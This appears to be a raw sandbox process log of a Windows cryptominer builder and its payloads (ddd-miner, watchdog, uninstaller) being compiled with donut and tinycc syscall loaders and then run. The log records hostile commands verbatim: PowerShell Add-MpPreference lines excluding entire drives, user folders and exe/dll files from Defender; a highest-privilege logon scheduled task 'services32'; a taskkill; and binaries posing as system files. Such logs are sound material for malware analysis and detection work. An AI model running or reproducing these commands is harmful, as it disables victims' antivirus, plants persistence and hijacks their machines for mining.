"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "ddd-uninstaller.c" resource.o "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscalls.c" -xa "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscallsstubs.asm"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\ddd-miner.exe" -a 2 -f 1

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "ddd.c" resource.o "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscalls.c" -xa "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscallsstubs.asm"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xioxjlcu\xioxjlcu.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA09.tmp" "c:\Users\Admin\Downloads\CSC3EFC9AFFD274DC585B4E053164182.TMP"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/Downloads/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/Downloads/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\Downloads\Compilers\donut\donut.exe

"C:\Users\Admin\Downloads\Compilers\donut\donut.exe" "C:\Users\Admin\Downloads\ddd-watchdog.exe" -a 2 -f 1

C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe

"C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "ddd-watchdog-loader.c" resource.o "C:\Users\Admin\Downloads\Includes\syscalls.c" -xa "C:\Users\Admin\Downloads\Includes\syscallsstubs.asm"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5u5m2zkm\5u5m2zkm.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB69C.tmp" "c:\Users\Admin\Downloads\CSC6007CC3DEFCE40978BB523AA9D26AF2A.TMP"

C:\Users\Admin\Downloads\ddd-miner.exe

"C:\Users\Admin\Downloads\ddd-miner.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe

"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Users\Admin\Downloads\ddd-miner.exe

"C:\Users\Admin\Downloads\ddd-miner.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Users\Admin\Downloads\ddd-miner.exe

"C:\Users\Admin\Downloads\ddd-miner.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost32"

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tceimwir\tceimwir.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7911.tmp" "c:\Users\Admin\Downloads\CSC26FF11C39DE54EB4BCAF1EE39D36238D.TMP"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/Downloads/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/Downloads/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\Downloads\Compilers\donut\donut.exe

"C:\Users\Admin\Downloads\Compilers\donut\donut.exe" "C:\Users\Admin\Downloads\ddd-uninstaller-payload.exe" -a 2 -f 1

C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe

"C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "ddd-uninstaller.c" resource.o "C:\Users\Admin\Downloads\Includes\syscalls.c" -xa "C:\Users\Admin\Downloads\Includes\syscallsstubs.asm"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\Downloads\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\Downloads\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/Downloads/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/Downloads/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\Downloads\Compilers\donut\donut.exe

"C:\Users\Admin\Downloads\Compilers\donut\donut.exe" "C:\Users\Admin\Downloads\ddd-miner.exe" -a 2 -f 1

C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe

"C:\Users\Admin\Downloads\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "ddd.c" resource.o "C:\Users\Admin\Downloads\Includes\syscalls.c" -xa "C:\Users\Admin\Downloads\Includes\syscallsstubs.asm"

C:\Users\Admin\Downloads\ddd.exe

"C:\Users\Admin\Downloads\ddd.exe"

C:\Users\Admin\Downloads\ddd.exe

"C:\Users\Admin\Downloads\ddd.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Downloads\ddd.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Downloads\ddd.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services32.exe"

C:\Windows\system32\services32.exe

C:\Windows\system32\services32.exe

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe

"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff537bdcf8,0x7fff537bdd04,0x7fff537bdd10

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1892,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1888 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1452,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2228 /prefetch:11

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2332,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2348 /prefetch:13

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3388 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3340,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3440 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4172,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4200 /prefetch:9

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4636,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4664 /prefetch:1

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost32"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5280,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5288 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5420,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5548 /prefetch:14

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\Downloads\ddd.exe

"C:\Users\Admin\Downloads\ddd.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4332,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5684 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5404,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5556 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5600,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5308 /prefetch:14

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Downloads\ddd.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c taskkill /f /PID "3420"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\system32\taskkill.exe

taskkill /f /PID "3420"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services32.exe"

C:\Windows\system32\services32.exe

C:\Windows\system32\services32.exe

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe

"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost32"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=872,i,14584294604053728337,15348018664072982774,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4164 /prefetch:10

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i3rfnhoy\i3rfnhoy.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES246B.tmp" "c:\Users\Admin\AppData\Local\Temp\7zO454C4998\CSCC39E29CBB8847B3B9286CDF945D92C.TMP"

C:\Windows\SYSTEM32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe" --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\windres.exe --input resource.rc --output resource.o -O coff -DDefAdmin

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc" -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc.exe

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\bin\gcc -E -xc -DRC_INVOKED -DDefAdmin resource.rc

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\MinGW64\libexec\gcc\x86_64-w64-mingw32\4.9.2\cc1.exe

"C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../libexec/gcc/x86_64-w64-mingw32/4.9.2/cc1.exe" "-E" "-quiet" "-iprefix" "C:/Users/Admin/AppData/Local/Temp/7zO454C4998/Compilers/MinGW64/bin/../lib/gcc/x86_64-w64-mingw32/4.9.2/" "-D_REENTRANT" "-D" "RC_INVOKED" "-D" "DefAdmin" "resource.rc" "-mtune=generic" "-march=x86-64"

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\donut\donut.exe" "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\meow-watchdog.exe" -a 2 -f 1

C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe

"C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Compilers\tinycc\tcc.exe" -Wl,-subsystem=windows "meow-watchdog-loader.c" resource.o "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscalls.c" -xa "C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Includes\syscallsstubs.asm"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ikh2nv1u\ikh2nv1u.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2CA8.tmp" "c:\Users\Admin\AppData\Local\Temp\7zO454C4998\CSCC71639714D234F549EB78366C3E05579.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrh2qk5c\xrh2qk5c.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:AMD64 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES31D8.tmp" "c:\Users\Admin\AppData\Local\Temp\7zO454C4998\CSCDB63BCADB25A4E3395978E2E364A2DFD.TMP"

C:\Windows\SYSTEM32\cmd.exe

